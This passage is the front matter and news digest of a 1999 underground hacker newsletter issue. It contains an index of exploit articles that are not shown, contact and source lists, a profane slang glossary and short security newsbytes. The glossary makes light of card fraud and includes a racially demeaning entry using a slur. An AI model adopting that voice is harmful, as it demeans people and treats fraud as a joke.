-=-=-=-=-=-=-

    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =
  ==========================================================================
    [=HWA'99=]                         Number 16 Volume 1 1999 May 1st  99
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================
  
  
            
                                               


   Synopsis 
   ---------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended  however, to  complement such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, it's a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                     Welcome to HWA.hax0r.news ... #16

   =-----------------------------------------------------------------------=

          

    *******************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
    ***                                                             ***
    *** please join to discuss or impart news on techno/phac scene  ***
    *** stuff or just to hang out ... someone is usually around 24/7***
    ***                                                             ***
    *** Note that the channel isn't there to entertain you its for  ***
    *** you to talk to us and impart news, if you're looking for fun***
    *** then do NOT join our channel try #weirdwigs or something... ***
    *** we're not #chatzone or #hack                                ***
    ***                                                             ***
    *******************************************************************


  =-------------------------------------------------------------------------=

  Issue #16


  =--------------------------------------------------------------------------=



  
  [ INDEX ]
  =--------------------------------------------------------------------------=
    Key     Content                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    03.0  .. Telecardnews site, phone card and smartcard cracking.............
    04.0  .. Coldfusion mole.cfm..............................................
    05.0  .. More info on the CIH virus.......................................
    06.0  .. E-Commerce is still taking it in the gnards......................     
     06.1  .. E-commerce boom fueling Security Holes?.........................
    07.0  .. Anonymity guaranteed (PCworld)...................................
     07.1 .. Anonymity guaranteed (Zero Knowledge Systems).................... 
     07.2 .. The ZKS white paper.............................................. 
    08.0  .. Mitnick's accomplice Lewis DePayne, pleads guilty................
    09.0  .. Biometric databases? Not according to this report... ............
    10.0  .. In the wake of CIH ..............................................
     10.1 .. CIH 1.2 Virus Hits Few ..........................................
    11.0  .. Lockdown2000 review by BHZ ......................................
    12.0  .. ICQ99 Vulnerabilities and exploits...............................
     12.1 .. ICQ Homepage Exploit.............................................
    13.0  .. Possible DoS in WinNT RAS (PPTP)................................. 
    14.0  .. MFT problem could cause you to reformat drive (NTFS).............
    15.0  .. FireWalking a paper on determining Gateway Access Control Lists..
    16.0  .. IGMP+8 fragmentation attack for Linux ...........................
    17.0  .. local XFree 3.3.3 symlink root compromise..(freeBSD+others)......
    18.0  .. Microsoft Outlook Express internet zone vulnerability............
    19.0  .. Big Brother 1.09b/c security notice..............................
    20.0  .. "Cyborg Seeks Community" by Steve Mann, wearable cpus anyone?....
     20.1 .. :School For Cyborgs: By Steve Ditlea (sidebar to above article)..
    21.0  .. Anonymizing UNIX systems white paper by van Hauser/THC...........
    22.0  .. Ffingerd vulnerability...........................................
    23.0  .. DoS in IRC services..............................................
    24.0  .. New Java bug creates DoS for Win9x...............................
    25.0  .. QPOP 2.4b2 _demo_ REMOTE exploit for FreeBSD 2.2.5 and BSDi 2.1..
    26.0  .. BSDI IMAP2BIS remote root exploit................................
    27.0  .. Infod AIX exploit................................................
    28.0  .. Cold fusion exploit scanner......................................
    29.0  .. Updated CGI scanner scans for vulnerable servers scans 43 probs..
    30.0  .. MS Outlook has potential reply-to spoofing vulnerability.........
    31.0  .. Bash parsing vulnerability.......................................
    32.0  .. NetBSD Security Advisory 1999-009................................
    33.0  .. Explorer favicon.ico bug introduces new vulnerability............
    34.0  .. Cert: The Good Guys? (old boys network, reads like an ad for CERT)
    35.0  .. NASA finds scapegoat? - Programmer indicted......................
    36.0  .. CIH author found?................................................
    37.0  .. INTEL goes after Zero Knowledge Systems..........................
    38.0  .. NT-Exceed DoS....................................................
    39.0  .. NT4 Trojaned Profiles............................................
    40.0  .. Microsoft's web site virus haven! ...............................
    41.0  .. New viruses from http://www.wopr.com.............................
    42.0  .. Caldera COAS leaves shadow password file readable................
    43.0  .. NT4+SP4 filename length vulnerability............................
    44.0  .. CSMMail Windows SMTP Server Remote Buffer Overflow Exploit.......
    45.0  .. HP Sendmail 8.8.6 DoS............................................
    46.0  .. KKI inactive connections advisory................................
    47.0  .. How to achieve the status JP has with AntiOnline (from PacketStorm)
    48.0  .. Windows thread overrun from a Java Applet........................
    49.0  .. Phone Rangers break into GTE.....................................
    50.0  .. Police question CIH virus creator................................
    51.0  .. [ISN] The Virus Vault............................................
    52.0  .. [ISN] The Bad Guys are Crackers..................................
    53.0  .. [ISN] Email threats could bring down a 10yr jail term............
    54.0  .. [ISN] Singapore ISP scans customer computers for vulnerabilities.
    =--------------------------------------------------------------------------=   
    
    
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             that's tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: Aug19th-22nd Niagara Falls...    .................

    HA.HA  .. Humour and puzzles  ............................................
              
              Hey You!........................................................
              =------=........................................................
              
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    HOW.TO .. "How to hack" by our illustrious editor.........................
    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................
 
  =--------------------------------------------------------------------------=
     
     @HWA'99

     
  00.0  (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
     OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
     WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
     (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
     READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

     Important semi-legalese and license to redistribute:

     YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
     AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
     ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
     IN YOUR WRITING. LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE
     APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
     IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
     ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
     ME PRIVATELY current email cruciphux@dok.org

     THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
     WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
     THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

     I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
     AND REDISTRIBUTE/MIRROR. - EoD


     Although this file and all future issues are now copyright, some of
    the content holds its own copyright and these are printed and
    respected. News is news so i'll print any and all news but will quote
    sources when the source is known, if it's good enough for CNN it's good
    enough for me. And i'm doing it for free on my own time so pfffft. :)

    No monies are made or sought through the distribution of this material.
    If you have a problem or concern email me and we'll discuss it.

    cruciphux@dok.org

    Cruciphux [C*:.]



  00.1  CONTACT INFORMATION AND MAIL DROP
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:

	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5

    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org
    Distribution/Website........: sas72@usa.net

    @HWA



  00.2  Sources ***
        ~~~~~~~~~~~

     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) ..................http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ ...............http://www.l0pht.com/
    NewsTrolls .......................http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD ..............................http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+........................http://www.gammaforce.org/
    News site+........................http://www.projectgamma.com/
    News site+........................http://securityhole.8m.com/
    News site+........................http://www.403-security.org/
    News/Humour site+ ................http://www.innerpulse.com/

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+others>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/

    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0

    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack

    http://www.ottawacitizen.com/business/

    http://search.yahoo.com.sg/search/news_sg?p=hack

    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack

    http://www.zdnet.com/zdtv/cybercrime/

    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

    NOTE: See appendices for details on other links.


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm

    http://freespeech.org/eua/ Electronic Underground Affiliation

    http://ech0.cjb.net ech0 Security

    http://net-security.org Net Security
    ...


    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~

    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care whether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

          <a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>

    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the
    originator of the message. Please do not "CC" the bugtraq reflector address
    if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words
    that you post on this list and that reproduction of those words without
    your permission in any medium outside the distribution of this list may be
    challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)


    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe,
      visit http://www.counterpane.com/unsubform.html.  Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW.  He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09

                          ISSN  1004-042X

           Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
           News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
           Archivist: Brendan Kehoe
           Poof Reader:   Etaion Shrdlu, Jr.
           Shadow-Archivists: Dan Carosone / Paul Southworth
                              Ralph Sims / Jyrki Kuoppala
                              Ian Dickinson
           Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed


    Subscribe: mail majordomo@repsec.com with "subscribe isn".



    @HWA


  00.3  THIS IS WHO WE ARE
        ~~~~~~~~~~~~~~~~~~
 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/IRC+ man in black
      sas72@usa.net ............. currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black


      Foreign Correspondents/affiliate members
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       N0Portz ..........................: Australia
       Qubik ............................: United Kingdom
       system error .....................: Indonesia
       Wile (wile coyote) ...............: Japan/the East
       Ruffneck  ........................: Netherlands/Holland

       And unofficially yet contributing too much to ignore ;)

       Spikeman .........................: World media

       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      http://www.genocide2600.com/~spikeman/  .. Spikeman's DoS and protection site
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form. Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events its a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


    @HWA



  00.4  What's in a name? Why HWA.hax0r.news??
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeon-holed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up and comers, i'd highly recommend you get that book. It's almost
     like buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

  00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the terms related to personal usage and use in this zine are
    listed below: Some are very useful, others attempt to deny any possible
    attempts at eschewing obfuscation by obscuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavy equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
     @HWA            
     
     
                            -=-    :.    .:        -=-
                            
                            
                            

  01.0  Greets!?!?! yeah greets! w0w huh. - Ed
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Kevin Mitnick (watch yer back)     Dicentra
     vexxation      sAs72               Spikeman
     
     and the #innerpulse, #hns crew and some inhabitants of #leetchans .... 
     although I use the term 'leet loosely these days, <k0ff><snicker>  ;)
       
     
     kewl sites:

     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.genocide2600.com/
     + http://www.genocide2600.com/~spikeman/
     + http://www.genocide2600.com/~tattooman/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/

     @HWA


  01.1  Last minute stuff, rumours and newsbytes
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
       

    +++ When was the last time you backed up your important data?
    
    
    
    ++ Free Kevin demonstrations
    
       From Project Gamma http://www.projectgamma.com/
        
       April 30, 1999, 16:49
       Author: WHiTe VaMPiRe

       Demonstrations are being planned for Friday, June 4 in front of courthouses nationwide beginning at 2 PM to protest the unjust imprisonment
       of Kevin Mitnick. 

       Kevin Mitnick has been held in a pre-trial facility since February 15, 1995, four years, without even a bail hearing. What did he do? Murder,
       rape? No. He has been imprisoned for four years without even a bail hearing for possession of software allegedly worth millions of dollars.
       However, the companies asserting this have never proven these claims nor have they reported these "losses" to their stockholders, as is
       required by law. 

       Computer and legal experts agree that it is unlikely that any real damage occurred. The high numbers assume that every file and its associated
       research were wiped from existence. In truth, no such damage was ever reported. Yet, Kevin Mitnick remains imprisoned as if this actually
       happened. 

       Related links: 
        
        Free Kevin Demonstration  
        http://www.kevinmitnick.com/demo/index.html
        
        Mitnick documents exposed (included in previous issues)
        http://www.projectgamma.com/news/archive/1999/april/042499-1416.html    
    
    
    ++  Possible Linuxconf Vulnerability (local console)
    
    
        Approved-By: aleph1@UNDERGROUND.ORG 
        Date:   Thu, 29 Apr 1999 18:45:40 -0400 
        Reply-To: The Nefarious Type <prestochango@ANTIONLINE.COM> 
        Sender: Bugtraq List <BUGTRAQ@netspace.org> 
        From: The Nefarious Type <prestochango@ANTIONLINE.COM> 
        Subject:      Possible Linuxconf Vulnerability 
        To: BUGTRAQ@netspace.org 


    
            An older version of linuxconf was packaged with Redhat 5.1 and  I had
        not run into any problems with that version. But after installing the latest
        version (linuxconf-1.13r15-1) onto OpenLinux 1.3, I came upon a problem during
        boot. It had not detected /sbin/clock, so a menu appeared during boot and asked
        if I wanted to change this. This happened all before I was even prompted for a
        login.      
            The fact that someone who has physical access to the server can
        access linuxconf (which by default, can only be used under root) is kind of
        disturbing. So far, I have not been able to exploit this problem, though I'm
        guessing that it could be done (e.g. from that menu, access user configuration,
        etc.).
        
        
        Linuxconf Homepage
        http://www.solucorp.qc.ca/linuxconf/
        
        
        
        -PrestoChango
    
    ++  Computer Student Wrote Chernobyl Virus to Humiliate Antivirus Providers
        
        Contributed by Spikeman

        Chen Ing-hau, a 24-year-old computer student, has been arrested in
        Taiwan for creating the Chernobyl computer virus. Police said that Chen
        may not be charged with a crime. If he did not intend to spread the
        virus, he could avoid criminal charges, but if charged and convicted,
        Chen faces up to three years in prison under Taiwanese law. The question
        of civil liability still looms large for Chen, whose virus damaged
        600,000 personal computers worldwide when it was triggered on April 26.
        (The Boston Globe --
        http://www.boston.com/dailynews2/120/economy/Computer_student_wrote_Chernob:.shtml)      


    ++ NO COMMENT
        
       From HNS http://www.net-security.org/   
        
       by BHZ, Friday 30th Apr 1999 on 3:36 pm CET
       On 24.04.1999 Croatian Internet users went on strike against HiNet, the well known Croatian
       monopolistic ISP. On that day strike supporters didn't connect to the Internet at all.
       HiNet didn't give any information or statistics about the success or failure of our strike.
       Yesterday some good (but not so good) news came. They will charge our telephone
       impulses at the local rate (3 times cheaper than the "old" 077 number calls). OK, we
       were happy that we had succeeded in one step of our plans, but then a chilling shocker
       struck us. From 1st May the prices of all telephone impulses will grow 30%. What can
       we say about it? We will continue our protests in order to bring the quality and price of
       Croatian Internet connections up to western standards.

    
    
    ++  Summercon 99 

        (From HNN)
        
        Contributed by Weld Pond 
        It is that time again. Presented by r00t and Phrack
        Magazine Summercon99 will be held at the Omni Hotel,
        part of the CNN Center in downtown Atlanta. Admission
        is FREE (Feds and Press must pay) and everyone is
        invited! 

       HNN Cons Page http://www.hackernews.com/cons/cons.html
    
    ++  On Packetstorm;
    
        "The New Hacker's Dictionary v4.1.2" - The Jargon File is the definitive lexicon of Internet and hacker
        slang, history, folklore, tradition, and humor. This is the latest
        version (4.1.2), released on 4/28/99. Almost 10 MB of hacker jargon! By Eric Raymond. 
        http://www.Genocide2600.com/~tattooman/hacking-textfiles/jargon-4.1.2/ (Various formats)
        

    ++ Online banking system crashed
       
       From www.403-security.org
       http://www.403-security.org/Htmls/news.htm
       
       By Astral 29.04.1999 12:13

       A computer glitch is preventing a lot of users from using CheckFree Holdings Corp. online bill payment systems with
       programs such as MS.Money for accessing their accounts. A CheckFree spokesman said that it isn't known when the
       system is going to be fixed and ready for use. For now about 350 banks cannot use online paying services.
       The reason for this glitch isn't known yet; the system could have been hacked or it might just be some technical problem.

       Sorry no links for this story
       
    ++  Ministry Launches Cyber Attack? 

        From HNN http://www.hackernews.com/ April 29th

        contributed by sunny 
        The Ministry of Home Affairs in Singapore is being
        accused of breaking into the personal computer of a
        National University of Singapore law student. Ms Anne
        Lee, 21, is claiming that her SingNet account was
        broken into on 10 occasions in four days about two
        weeks ago. According to a protection program called
        Jammer, which was installed on the machine the IP
        address of the attack belonged to the Ministry of Home
        Affairs. The National Computer Board's assistant director
        of IT security, Mr Goh Seow Hiong, said "It is very
        difficult to change the IP address unless the person has
        very sophisticated skills." (Bwahahahahahaha) 

        The Straits Times
        http://straitstimes.asia1.com.sg/sin/sin2_0429.html
        
